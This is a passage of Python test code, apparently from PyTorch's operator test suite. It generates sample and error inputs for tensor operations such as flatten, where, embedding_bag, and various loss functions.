shapes = ((S, S, S, S), (S, S, S), (S, S), (S, ), (),) make_tensor_partial = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) samples = [] for shape in shapes: input_list.append(make_tensor_partial(shape)) samples.append(SampleInput(make_tensor_partial(shape))) samples.append(SampleInput(input_list, )) return samples def sample_inputs_column_stack(op_info, device, dtype, requires_grad, **kwargs): input_list = [] cases: Tuple[tuple, tuple] = ( # type: ignore[assignment] ((S, 2, 1), (S, 3, 1)), ((S), (S, 5)), ((), (1, S)) ) make_tensor_partial = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) for shape1, shape2 in cases: input_list.append(SampleInput([make_tensor_partial(shape1), make_tensor_partial(shape2)])) return input_list def sample_inputs_flatten(op_info, device, dtype, requires_grad, **kwargs): samples = [] shapes = ((S, S, S), (S, S), (S, ), (),) make_tensor_partial = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) for shape in shapes: samples.append(SampleInput(make_tensor_partial(shape))) if len(shape) > 1: samples.append(SampleInput(make_tensor_partial(shape), kwargs=dict(start_dim=1, end_dim=-1))) return samples def reference_inputs_flatten(op, device, dtype, requires_grad, **kwargs): yield from sample_inputs_flatten(op, device, dtype, requires_grad, **kwargs) # shape x start_dim x end_dim cases = ( ((5, 4, 0, 1, 3, 7), 1, 3), ((5, 4, 0, 1, 3, 7), 4, 5), ((5, 4, 1, 1, 3, 7), 2, 3), ((), 0, -1), ((1,), 0, -1), ((3, 7, 5), 1, 2), ((4, 5), 1, 1), ((1, 5, 5, 1, 5, 1, 5, 1), 0, 2), ((1, 5, 5, 1, 5, 1, 5, 1), 3, -1), ((1, 5, 5, 1, 5, 7, 5, 1), -2, -1), ((2, 4, 2), 0, 1), ((4, 2, 2), 1, 2), ((0, 3, 4, 5), 1, 3), ) make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) for shape, start, end in cases: yield SampleInput(make_arg(shape), args=(start, end,)) yield SampleInput(make_arg(shape, noncontiguous=True).transpose(0, -1), args=(start, end,)) yield SampleInput(make_arg(shape).transpose(0, -1), args=(start, end,)) def sample_inputs_select(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) cases = (((S, S, S), (1, 2)), ((S, S, S), (-1, 2)), ((S, S, S), (-1, -1)), ((S, S, S), (1, -1)), ((S,), (0, 2)) ) for shape, args in cases: yield SampleInput(make_arg(shape), args=args) def sample_inputs_select_scatter(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) cases = (((S, S, S), (S, S), (1, 2)), ((S, S, S), (S, S), (-1, 2)), ((S, S, S), (S, S), (-1, -1)), ((S, S, S), (S, S), (1, -1)), ((S,), (), (0, 2)) ) for input_shape, src_shape, args in cases: input_ = make_arg(input_shape) src = make_arg(src_shape) yield SampleInput(input_, args=(src, *args)) def sample_inputs_slice_scatter(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) cases = (((L, L, L), (L, L, L,), (0, 0, L, 1)), ((L, L, L), (L // 2, L, L,), (0, L // 2, L, 1)), ((L, L, L), (L // 4, L, L,), (0, L // 2, L, 2)), ((L, L, L), (L, L, L,), (1, 0, L, 1)), ((L, L, L), (L, L // 2, L,), (1, L // 2, L, 1)), ((L, L, L), (L, L // 4, L,), (1, L // 2, L, 2)), ((L, L, L), (L, L, L,), (2, 0, L, 1)), ((L, L, L), (L, L, L // 2,), (2, L // 2, L, 1)), ((L, L, L), (L, L, L // 4,), (2, L // 2, L, 2)), ) for input_shape, src_shape, args in cases: input_ = 
make_arg(input_shape)
        src = make_arg(src_shape)
        yield SampleInput(input_, args=(src, *args))


def sample_inputs_expand(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad)

    cases = (((S, 1, 1), (S, S, S)),
             ((S, 1, S), (S, S, S)),
             ((S, 1, S), (-1, S, -1)),
             ((S, 1, S), (-1, S, S)),
             ((S, 1), (S, S, S)),
             ((1,), (S, S, S)),
             ((1, S), (1, 1, S)),
             ((), ()),
             ((), (1, 3, 2)),
             )

    for case in cases:
        shape, args = case
        yield(SampleInput(make_arg(shape), args=(args, )))


def sample_inputs_conversion(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad)

    shapes = ((),
              (2, 3))
    memory_format_options = [None, torch.contiguous_format]

    for shape, memory_format in itertools.product(shapes, memory_format_options):
        yield SampleInput(make_arg(shape),
                          kwargs={'memory_format': memory_format} if memory_format else {})
    yield SampleInput(make_arg((2, 3, 2, 3)), kwargs={'memory_format': torch.channels_last})


def sample_inputs_expand_as(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, dtype=dtype, device=device)

    cases = (((S, 1, 1), (S, S, S)),
             ((), ()),
             ((), (1, 1)),
             )

    for shape, shape_other in cases:
        yield(SampleInput(make_arg(shape, requires_grad=requires_grad),
                          args=(make_arg(shape_other, requires_grad=False), )))


def sample_inputs_where(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad)

    def make_bool_mask(shape):
        # Make sure at least one element is nonzero,
        # except for an empty tensor
        mask_t = make_tensor(shape, dtype=torch.bool, device=device, requires_grad=False)

        if mask_t.numel() == 0:
            return mask_t
        elif mask_t.numel() == 1:
            mask_t.fill_(True)
            return mask_t

        if mask_t.sum() == 0:
            def random_index(shape):
                return tuple(map(lambda max_idx: random.randint(0, max_idx), shape))

            mask_t[random_index(mask_t.shape)] = True
            return mask_t

        return mask_t

    cases = (((M, M), (M, M), (M, M), False),
             ((M, 1, M), (M, M), (M, M, 1), True),
             ((), (), (), False),
             ((M, 1, M), (), (M, M, 1), True),
             ((), (M, M), (), True),)

    for shape, mask_shape, other_shape, broadcasts_input in cases:
        yield SampleInput(make_arg(shape),
                          args=(make_bool_mask(mask_shape), make_arg(other_shape)),
                          broadcasts_input=broadcasts_input)

# TODO: add reference inputs for where(condition) signature
def reference_inputs_where(op, device, dtype, requires_grad, **kwargs):
    yield from sample_inputs_where(op, device, dtype, requires_grad, **kwargs)

    make_cond = partial(make_tensor, dtype=torch.bool, device=device, requires_grad=requires_grad)
    make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad)

    # noncontiguous
    c = make_cond((10, 3), noncontiguous=True)
    a = make_arg((10, 1), noncontiguous=True)
    b = make_arg((3, 10, 3)).transpose(0, -1)

    # NOTE that the OpInfo for where takes samples of the form a, cond, b
    yield SampleInput(a, args=(c, b))

    # type promoting
    other_dtype = torch.double if dtype is not torch.double else torch.long
    c = make_cond((10, 3), noncontiguous=True)
    a = make_arg((10, 1), dtype=other_dtype)
    b = make_arg((10, 1))

    yield SampleInput(a, args=(c, b))

    # NaN propagation
    if dtype.is_floating_point or dtype.is_complex:
        if dtype.is_floating_point:
            nan = float('nan')
        else:
            # dtype.is_complex
            nan = complex(float('nan'), float('nan'))
        c = make_cond((1, 10, 3))
        a = make_arg((10, 3), noncontiguous=True)
        a[2, 1] = nan
        b = make_arg((1, 3))
        b[0, 2] = nan

        yield
SampleInput(a, args=(c, b)) def error_inputs_where(op_info, device, **kwargs): shape = (S,) err_msg = "Expected all tensors to be on the same device" for devices in product(('cpu', device), repeat=3): if len(set(devices)) == 2: si = SampleInput(make_tensor(shape, device=devices[0], dtype=torch.float32), args=(make_tensor(shape, dtype=torch.bool, device=devices[1]), make_tensor(shape, device=devices[2], dtype=torch.float32))) yield ErrorInput(si, error_regex=err_msg) def sample_inputs_nonzero(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) sizes = ((), (S,), (S, S), (S, S, S), (S, 1, S), (S, 0, S)) inputs = [] for shape in sizes: # construct input without any non-zero elements zeros = torch.zeros(shape, dtype=dtype, device=device, requires_grad=requires_grad) inputs.append(zeros) # construct input with mixed zero and non-zero elements mixed = make_arg(shape).requires_grad_(False) mask_t = make_tensor(shape, dtype=torch.bool, device=device, requires_grad=False) mixed[mask_t] = 0 inputs.append(mixed) for input_t, as_tuple in product(inputs, [False, True]): yield(SampleInput(input_t.clone().requires_grad_(requires_grad), kwargs=dict(as_tuple=as_tuple))) def sample_inputs_chunk(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) cases = (((S, S, S), (2,)), ((S, S, S), (S, 1)), ((S, S, S), (S, -1))) for case in cases: shape, args = case yield(SampleInput(make_arg(shape), args=args)) def reference_inputs_chunk(op, device, dtype, requires_grad, **kwargs): yield from sample_inputs_chunk(op, device, dtype, requires_grad, **kwargs) make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) # shape x chunks x dim cases = ( ((13, 9, 11), 17, -1), ((13, 9, 11), 11, -1), ((13,), 12, -1), ((15,), 12, -1), ((15,), 7, 0), ((15,), 9, 0), ((3, 7), 9, 1), ((3, 7), 9, 0), ((3, 7), 2, 0), ((3, 7), 3, 0), ((3, 7), 1, 0), ((3, 7), 1, 1), ((4, 4), 2, 0), ) for shape, chunks, dim in cases: yield SampleInput(make_arg(shape), args=(chunks, dim)) def sample_inputs_kthvalue(op_info, device, dtype, requires_grad, **kwargs): def _tensor(shape, dtype=dtype, low=None, high=None): return make_tensor(shape, dtype=dtype, device=device, low=low, high=high, requires_grad=requires_grad) test_cases = [ (_tensor((S, S, S)), (2,)), (_tensor((S, S, S)), (2, 1,)), (_tensor((S, S, S)), (2, -1,)), (_tensor((S, S, S)), (2, 1, True,)), (_tensor((S, S, S)), (2, -1, True,)), (_tensor((S,)), (2, 0,)), (_tensor((S,)), (2, 0, True,)), (_tensor(()), (1,)), (_tensor(()), (1, 0,)), (_tensor(()), (1, 0, True)) ] return [SampleInput(tensor, args=args) for tensor, args in test_cases] def error_inputs_kthvalue(op_info, device, **kwargs): # tests overlapping output fails t = make_tensor(10, dtype=torch.float32, device=device) indices = torch.empty((), device=device, dtype=torch.long) si = SampleInput(t, args=(5,), kwargs={'out': (t, indices)}) k_out_of_range_err = "selected number k out of range for dimension" return (ErrorInput(si, error_regex="unsupported operation"), ErrorInput(SampleInput(torch.randn(2, 2, device=device), args=(3, 0)), error_regex=k_out_of_range_err), ErrorInput(SampleInput(torch.randn(2, 2, device=device), args=(3,)), error_regex=k_out_of_range_err), ErrorInput(SampleInput(torch.tensor(2, device=device), args=(3,)), error_regex=k_out_of_range_err),) def sample_inputs_dropout(op_info, device, dtype, requires_grad, *, 
train=None, valid_input_dim=None, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) if valid_input_dim: cases = ((S,) * i for i in valid_input_dim) else: cases = ((S, S), (S,), ()) p_vals = [0.0, 0.5, 1.0] # This is to handle special case for feature_alpha_dropout which has different # supported dtypes depending on `train` parameter training_vals = [train] if train is not None else [True, False] for case, p, training in product(cases, p_vals, training_vals): yield SampleInput(make_arg(case), kwargs=dict(p=p, training=training)) yield SampleInput(make_arg(case), kwargs=dict()) def sample_inputs_embedding_bag(op_info, device, dtype, requires_grad, **kwargs): def make_input(shape): return make_tensor(shape, device=device, dtype=dtype, requires_grad=requires_grad) def make_long_input(shape, *, low, high, noncontiguous=False): return make_tensor(shape, device=device, dtype=torch.long, low=low, high=high, noncontiguous=noncontiguous) def make_per_sample_weight(flag, idx): # a tensor of float / double weights, or None # to indicate all weights should be taken to be 1 if flag: return make_input(idx.shape) return None offsets = torch.tensor([0, 3], device=device, dtype=torch.long) for generate_per_sample_weight in (True, False): for mode in ('sum', 'mean', 'max'): # per_sample_weights is only supported for mode='sum' (got mode='****') if generate_per_sample_weight and mode in ('mean', 'max'): continue # 1-D index tensor idx = make_long_input((S,), low=0, high=M) per_sample_weights = make_per_sample_weight(generate_per_sample_weight, idx) yield SampleInput(make_input((M, S)), args=(idx,), kwargs={'offsets': offsets, 'mode': mode, 'per_sample_weights': per_sample_weights}) idx = make_long_input((S,), low=0, high=M, noncontiguous=True) per_sample_weights = make_per_sample_weight(generate_per_sample_weight, idx) yield SampleInput(make_input((M, S)), args=(idx,), kwargs={'offsets': offsets, 'mode': mode, 'per_sample_weights': per_sample_weights}) # bag with zero length idx = make_long_input((S,), low=0, high=M, noncontiguous=True) per_sample_weights = make_per_sample_weight(generate_per_sample_weight, idx) yield SampleInput(make_input((M, S)), args=(idx,), kwargs={'offsets': torch.tensor([0, 0, 3], device=device, dtype=torch.long), 'mode': mode, 'per_sample_weights': per_sample_weights}) # 2-D index tensor idx = make_long_input((S, S), low=0, high=M) per_sample_weights = make_per_sample_weight(generate_per_sample_weight, idx) yield SampleInput(make_input((M, S)), args=(idx,), kwargs={'mode': mode, 'per_sample_weights': per_sample_weights}) idx = make_long_input((S, S), low=0, high=M, noncontiguous=True) per_sample_weights = make_per_sample_weight(generate_per_sample_weight, idx) yield SampleInput(make_input((M, S)), args=(idx,), kwargs={'mode': mode, 'per_sample_weights': per_sample_weights}) # The gradient vector at `padding_idx` is not updated. 
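# A minimal doctest-style sketch of that semantic (tensor values are
# hypothetical; `weight`, `idx`, and `offsets` mirror the names used by these
# samples, and F.embedding_bag is the documented functional API):
# >>> weight = torch.randn(S, S, requires_grad=True)
# >>> idx = torch.tensor([4, 0, 4, 1, 2, 3])
# >>> F.embedding_bag(idx, weight, offsets, padding_idx=-1).sum().backward()
# >>> weight.grad[-1].abs().sum()
# tensor(0.)  # the padding row (index S - 1 here) receives a zero gradient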
# Negative padding_idx idx = make_long_input((6,), low=0, high=S) idx[0] = 4 idx[4] = 4 per_sample_weights = make_per_sample_weight(generate_per_sample_weight, idx) yield SampleInput(make_input((S, S)), args=(idx,), kwargs={'padding_idx': -1, 'offsets': offsets, 'mode': mode, 'per_sample_weights': per_sample_weights},) idx = make_long_input((3, 3), low=0, high=S) # Positive padding_idx idx[0, 0] = 2 idx[1, 1] = 2 per_sample_weights = make_per_sample_weight(generate_per_sample_weight, idx) yield SampleInput(make_input((S, S)), args=(idx,), kwargs={'padding_idx': 2, 'mode': mode, 'per_sample_weights': per_sample_weights},) idx = make_long_input((6, ), low=0, high=S) weights = make_input((S, S)) offsets_ = torch.tensor([0, 3, 6], device=device, dtype=torch.long) per_sample_weights = make_per_sample_weight(generate_per_sample_weight, idx) yield SampleInput(weights, args=(idx,), kwargs={'mode': mode, 'offsets': offsets_, 'include_last_offset': True},) if not requires_grad: # Following inputs return different gradient from the numerical gradient. # This is expected and relevant tests are present in `test_nn.py`. # Due to inplace renorming of weight, the numerical gradient doesn't match the # analytical gradient. idx = make_long_input((2, 2), low=0, high=S) weights = make_input((S, S)) * 2 per_sample_weights = make_per_sample_weight(generate_per_sample_weight, idx) yield SampleInput(weights, args=(idx,), kwargs={'max_norm': 1., 'mode': mode, 'per_sample_weights': per_sample_weights},) idx = make_long_input((6, ), low=0, high=S) weights = make_input((S, S)) * 2 per_sample_weights = make_per_sample_weight(generate_per_sample_weight, idx) yield SampleInput(weights, args=(idx,), kwargs={'max_norm': 1., 'norm_type': 1.0, 'mode': mode, 'offsets': offsets, 'per_sample_weights': per_sample_weights},) if mode != 'max': # Scale the gradient based on the inverse frequency of a particular index. # Note : max mode does not support sparse weights idx = make_long_input((2, 2), low=0, high=S) idx[0, 0] = 1 idx[0, 1] = 1 weights = make_input((S, S)) per_sample_weights = make_per_sample_weight(generate_per_sample_weight, idx) yield SampleInput(weights, args=(idx,), kwargs={'scale_grad_by_freq': True, 'mode': mode, 'per_sample_weights': per_sample_weights},) # gradcheck not implemented for sparse tensors.
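# Sketch of why gradcheck is skipped here (names reuse the ones above; the
# call is illustrative, not something this generator executes):
# >>> out = F.embedding_bag(idx, weight, offsets, mode='sum', sparse=True)
# >>> out.sum().backward()
# >>> weight.grad.layout
# torch.sparse_coo  # gradcheck can only perturb strided tensors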
# Note : max mode does not support sparse weights idx = make_long_input((6, ), low=0, high=S) weights = make_input((S, S)) per_sample_weights = make_per_sample_weight(generate_per_sample_weight, idx) yield SampleInput(weights, args=(idx,), kwargs={'sparse': True, 'offsets': offsets, 'mode': mode, 'per_sample_weights': per_sample_weights}) idx = make_long_input((6, ), low=0, high=S) idx[0] = 1 # freq more than 1 idx[1] = 1 # freq more than 1 idx[3] = 0 # padding_idx weights = make_input((S, S)) * 2 per_sample_weights = make_per_sample_weight(generate_per_sample_weight, idx) yield SampleInput(weights, args=(idx,), kwargs={'sparse': True, 'scale_grad_by_freq': True, 'padding_idx': 0, 'max_norm': 1., 'offsets': offsets, 'mode': mode, 'per_sample_weights': per_sample_weights}) def sample_inputs_embedding(op_info, device, dtype, requires_grad, **kwargs): def make_input(shape): return make_tensor(shape, device=device, dtype=dtype, requires_grad=requires_grad) def make_long_input(shape, *, low, high): return make_tensor(shape, device=device, dtype=torch.long, low=low, high=high) # 0-D index tensor idx = make_long_input((), low=0, high=M) yield SampleInput(make_input((M, S)), args=(idx,),) # 1-D index tensor idx = make_long_input((S,), low=0, high=M) yield SampleInput(make_input((M, S)), args=(idx,),) # 2-D index tensor idx = make_long_input((S, S), low=0, high=M) yield SampleInput(make_input((M, S)), args=(idx,),) if not requires_grad: # Following inputs return different gradient from the numerical gradient. # This is expected and relevant tests are present in `test_nn.py`. # The gradient vector at `padding_idx` is not updated. idx = make_long_input((2, 2), low=0, high=S) idx[0, 0] = 2 idx[1, 1] = 2 yield SampleInput(make_input((S, S)), args=(idx,), kwargs={'padding_idx': 2},) idx = make_long_input((2, 2), low=0, high=S) idx[0, 0] = 4 idx[1, 1] = 4 yield SampleInput(make_input((S, S)), args=(idx,), kwargs={'padding_idx': -1},) # Due to inplace renorming of weight, the numerical gradient doesn't match the # analytical gradient. idx = make_long_input((2, 2), low=0, high=S) weights = make_input((S, S)) * 2 yield SampleInput(weights, args=(idx,), kwargs={'max_norm': 1.},) idx = make_long_input((2, 2), low=0, high=S) weights = make_input((S, S)) * 2 yield SampleInput(weights, args=(idx,), kwargs={'max_norm': 1., 'norm_type': 1.0},) # Scale the gradient based on the inverse frequency of a particular index. idx = make_long_input((2, 2), low=0, high=S) idx[0, 0] = 1 idx[0, 1] = 1 weights = make_input((S, S)) yield SampleInput(weights, args=(idx,), kwargs={'scale_grad_by_freq': True},) # gradcheck not implemented for sparse tensors. 
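# Same limitation for plain embedding; a hypothetical illustration of the
# sparse gradient's structure (it indexes exactly the rows that were looked up):
# >>> F.embedding(torch.tensor([[0, 1], [2, 1]]), weight, sparse=True).sum().backward()
# >>> weight.grad.coalesce().indices()
# tensor([[0, 1, 2]])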
idx = make_long_input((2, 2), low=0, high=S) weights = make_input((S, S)) yield SampleInput(weights, args=(idx,), kwargs={'sparse': True}) idx = make_long_input((3, 3), low=0, high=S) idx[0, 0] = 1 # freq more than 1 idx[0, 1] = 1 # freq more than 1 idx[1, 0] = 0 # padding_idx weights = make_input((S, S)) * 2 yield SampleInput(weights, args=(idx,), kwargs={'sparse': True, 'scale_grad_by_freq': True, 'padding_idx': 0, 'max_norm': 1.}) def sample_inputs_one_hot(op_info, device, dtype, requires_grad, **kwargs): def make_input(shape, *, low, high): return make_tensor(shape, device=device, dtype=dtype, low=low, high=high, requires_grad=requires_grad) shapes = ((), (S,), (L, M, S)) num_classess = (-1, 10) return [ SampleInput( make_input( shape, low=0, high=10 if num_classes == -1 else num_classes // 2, ), kwargs=dict(num_classes=num_classes), ) for shape, num_classes in itertools.product(shapes, num_classess) ] def sample_inputs_tensorinv(op_info, device, dtype, requires_grad, **kwargs): make_arg = make_fullrank_matrices_with_distinct_singular_values def make_input(): return make_arg(12, 12, device=device, dtype=dtype, requires_grad=requires_grad) # lhs / rhs shape can have any number of dimensions as long as their product equals 12 shapes = [ ((2, 2, 3), (12, 1)), ((4, 3), (6, 1, 2)), ] samples = [] for shape_lhs, shape_rhs in shapes: inp = make_input().reshape(*shape_lhs, *shape_rhs).detach() inp.requires_grad_(requires_grad) samples.append(SampleInput(inp, kwargs=dict(ind=len(shape_lhs)))) return samples def sample_inputs_tensorsolve(op_info, device, dtype, requires_grad, **kwargs): a_shapes = [(2, 3, 6), (3, 4, 4, 3)] # Zero-dim tensors are not supported in NumPy, so we skip them for now. # NumPy is used in reference check tests. # See https://github.com/numpy/numpy/pull/20482 for tracking NumPy bugfix. 
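# For orientation (an illustrative call, not one of the generated samples):
# torch.linalg.tensorsolve matches np.linalg.tensorsolve, i.e. `a` is reshaped
# (after moving `dims` to the end) into a square matrix whose side is b.numel(),
# and the solution takes the trailing shape of `a`:
# >>> a, b = torch.randn(2, 3, 6), torch.randn(2, 3)
# >>> torch.linalg.tensorsolve(a, b).shape
# torch.Size([6])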
# a_shapes += [(0, 0, 1, 2, 3, 0)] dimss = [None, (0, 2)] for a_shape, dims in itertools.product(a_shapes, dimss): a = make_tensor(a_shape, dtype=dtype, device=device, requires_grad=requires_grad) b = make_tensor(a_shape[:2], dtype=dtype, device=device, requires_grad=requires_grad) yield SampleInput(a, args=(b,), kwargs=dict(dims=dims)) def sample_inputs_loss(op_info, device, dtype, requires_grad, **kwargs): rhs_requires_grad = kwargs.get('rhs_requires_grad', requires_grad) _make_tensor = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) # Although most losses also support the reduce and size_average combination instead of reduction, the former is # deprecated since 0.4.1 and thus is not tested shapes_and_kwargs = ( ((), None), ((S,), dict(reduction="mean")), ((S,), dict(reduction="sum")), ((S,), dict(reduction="none")), ((S, S), None), ((S, S, S), None), ) for shape, kwargs in shapes_and_kwargs: yield SampleInput(_make_tensor(shape), args=(_make_tensor(shape, requires_grad=rhs_requires_grad),), kwargs=kwargs) def sample_inputs_grid_sample(op_info, device, dtype, requires_grad, **kwargs): _make_tensor = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) batch_size = 2 num_channels = 3 modes = ("bilinear", "nearest") align_cornerss = (False, True) padding_modes = ("zeros", "border", "reflection") sample_inputs = [] for dim in (2, 3): modes_ = (*modes, "bicubic") if dim == 2 else modes for mode, padding_mode, align_corners in itertools.product(modes_, padding_modes, align_cornerss): sample_inputs.append( SampleInput( _make_tensor((batch_size, num_channels, *[S] * dim)), args=(_make_tensor((batch_size, *[S] * dim, dim)),), kwargs=dict( mode=mode, padding_mode=padding_mode, align_corners=align_corners, ) ) ) return sample_inputs def sample_inputs_cosine_embedding_loss(op_info, device, dtype, requires_grad, **kwargs): make_input = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) def make_target(shape): shape = () if len(shape) == 1 else (shape[0], ) t = torch.randint(0, 2, shape, device=device, dtype=torch.long) # Label with -1 or 1 t = t * 2 - 1 target = t.to(dtype=dtype).detach_().requires_grad_(requires_grad) return target shapes = ((S, S), (S,)) reductions = ('none', 'mean', 'sum') for s, r in product(shapes, reductions): yield SampleInput( make_input(s), args=(make_input(s), make_target(s)), kwargs=dict(reduction=r, margin=random.uniform(-1, 1)) ) def sample_inputs_ctc_loss(op_info, device, dtype, requires_grad, **kwargs): input_length = 50 batch = 16 num_char = 20 target_length = 30 def make_log_probs(s): t = make_tensor(s, device=device, dtype=dtype) log_probs = t.log_softmax(2).to(device=device, dtype=dtype).detach().requires_grad_(requires_grad=requires_grad) return log_probs reductions = ('none', 'mean', 'sum') zero_inf = (True, False) for r, z in product(reductions, zero_inf): log_probs = make_log_probs((input_length, batch, num_char)) targets = torch.randint(1, num_char, (batch, target_length), dtype=torch.long, device=device) input_lengths = torch.full((batch, ), input_length, dtype=torch.long, device=device) target_lengths = torch.randint(10, target_length, (batch, ), dtype=torch.long, device=device) yield SampleInput(log_probs, args=(targets, input_lengths, target_lengths,), kwargs=dict(reduction=r, zero_infinity=z)) def sample_inputs_nll_loss(op_info, device, dtype, requires_grad, **kwargs): shape = (2, 3) num_classes = shape[1] make_input = partial(make_tensor, device=device, dtype=dtype,
requires_grad=requires_grad) # FIXME: Derivative wrt. weight not implemented make_weight = partial(make_tensor, num_classes, device=device, dtype=dtype, requires_grad=False) def make_target(shape, zeros=False): s = (shape[0], *shape[2:]) if len(shape) > 1 else () if zeros: return torch.zeros(s, device=device, dtype=torch.long) else: return make_tensor(s, low=0, high=shape[1] if len(shape) > 1 else shape[0], device=device, dtype=torch.long) def gen_shape_kwargs(): # Batched, non-batched and 2d shapes = (shape, (num_classes,), shape + (2, 2)) reductions = ('none', 'mean', 'sum') for reduction, s in product(reductions, shapes): yield make_input(s), make_target(s), dict(reduction=reduction) yield make_input(s), make_target(s), dict(weight=make_weight(), reduction=reduction) yield make_input(s), make_target(s), dict(weight=make_weight(low=0), reduction=reduction) yield make_input(s), make_target(s), dict(weight=make_weight(high=0), reduction=reduction) t = make_target(s) ignore = num_classes // 2 # If "mean", nll returns NaN, so it's not differentiable at those points if t.eq(ignore).all() and reduction == "mean": t.fill_(0) yield make_input(s), t, dict(ignore_index=num_classes // 2, reduction=reduction) yield make_input(s), t, dict(ignore_index=num_classes // 2, reduction=reduction, weight=make_weight()) # Test ignoring all the targets # If "mean", nll returns NaN, so it's not differentiable at those points if reduction != "mean": yield make_input(s), make_target(s, zeros=True), dict(ignore_index=0, reduction=reduction) for input, target, kwargs in gen_shape_kwargs(): yield SampleInput(input, args=(target,), kwargs=kwargs) def sample_inputs_binary_cross_entropy_with_logits( op_info, device, dtype, requires_grad, **kwargs ): make = partial(make_tensor, device=device, dtype=dtype) make_prob = partial(make, low=0, high=1) reductions = ("mean", "sum", "none") def make_weight_shape_kwargs(): kwargs = [] for shape in ((1,), (1, S), (S), (S, S)): kwargs.extend([((S, S), dict(reduction=reduction, weight=make(shape))) for reduction in reductions]) return kwargs shapes_and_kwargs = [ *[(shape, None) for shape in ((), (1,), (S,), (S, S), (S, S, S))], *[((S, S), dict(reduction=reduction)) for reduction in reductions], *make_weight_shape_kwargs(), *[((S, S), dict(reduction=reduction, pos_weight=make((S,), low=0))) for reduction in reductions], *[((S, S), dict(reduction=reduction, weight=make((S, S)), pos_weight=make((S,), low=0))) for reduction in reductions], ] for shape, kwargs in shapes_and_kwargs: yield SampleInput( make(shape, requires_grad=requires_grad), args=(make_prob(shape, requires_grad=requires_grad),), kwargs=kwargs, ) def sample_inputs_argwhere(op_info, device, dtype, requires_grad, **kwargs): yield SampleInput(torch.tensor([1, 0, 2, 0], dtype=dtype, device=device, requires_grad=requires_grad)) mask = torch.tensor([[0, 1, 0, 1, 0], [1, 1, 1, 1, 0], [0, 0, 0, 1, 0], [1, 0, 1, 1, 0], [1, 0, 0, 1, 0]], dtype=torch.bool, device=device) t = make_tensor((S, S), dtype=dtype, device=device, requires_grad=requires_grad) t[mask] = 0 yield SampleInput(t) t = make_tensor((S, S), dtype=dtype, device=device, requires_grad=requires_grad, noncontiguous=True) t[mask] = 0 yield SampleInput(t) t = make_tensor((S, 0), dtype=dtype, device=device, requires_grad=requires_grad) yield SampleInput(t) yield SampleInput(torch.zeros((S,), dtype=dtype, device=device, requires_grad=requires_grad)) yield SampleInput(make_tensor((), dtype=dtype, device=device, requires_grad=requires_grad)) def 
_generate_sample_shape_reduction(): shapes = ((S,), (S, S), (S, S, S)) reductions = ('none', 'mean', 'sum') for s, r in product(shapes, reductions): yield s, r def sample_inputs_gaussian_nll_loss(op_info, device, dtype, requires_grad, **kwargs): _make_tensor = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) # Set low slightly above 0 so gradcheck doesn't accidentally dip below 0 make_var = partial(make_tensor, low=0.1, device=device, dtype=dtype, requires_grad=requires_grad) def gen_shape(shape): yield shape # Broadcast yield (*shape[:-1], 1) yield shape[:-1] def gen_shape_kwargs(): for s, r in _generate_sample_shape_reduction(): for t_s, v_s in product(gen_shape(s), gen_shape(s)): yield _make_tensor(s), _make_tensor(t_s), make_var(v_s), dict(reduction=r) yield ( _make_tensor(s), _make_tensor(t_s), make_var(v_s), dict(full=True, reduction=r) ) yield ( _make_tensor(s), _make_tensor(t_s), make_var(v_s), dict(eps=random.uniform(1e-6, 1e-3), reduction=r) ) yield ( _make_tensor(s), _make_tensor(t_s), make_var(v_s), dict(full=True, eps=random.uniform(1e-6, 1e-3), reduction=r) ) for input, target, var, kwargs in gen_shape_kwargs(): yield SampleInput(input, args=(target, var, ), kwargs=kwargs) def _generate_sample_inputs_nn_loss(op_info, device, dtype, requires_grad, **kwargs): _make_tensor = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) for s, r in _generate_sample_shape_reduction(): yield _make_tensor(s), _make_tensor(s), dict(reduction=r) def sample_inputs_hinge_embedding_loss(op_info, device, dtype, requires_grad, **kwargs): for input, target, d in _generate_sample_inputs_nn_loss(op_info, device, dtype, requires_grad, **kwargs): # target should contain either 1 or -1 as per docs mask = torch.rand_like(target) > 0.5 target[mask] = 1 target[~mask] = -1 d['margin'] = random.uniform(-9, 9) yield SampleInput(input, args=(target, ), kwargs=d) # scalar input and target. 
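# For reference, the per-element loss these samples exercise is (per the docs):
#   l_n = x_n                   if y_n == 1
#   l_n = max(0, margin - x_n)  if y_n == -1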
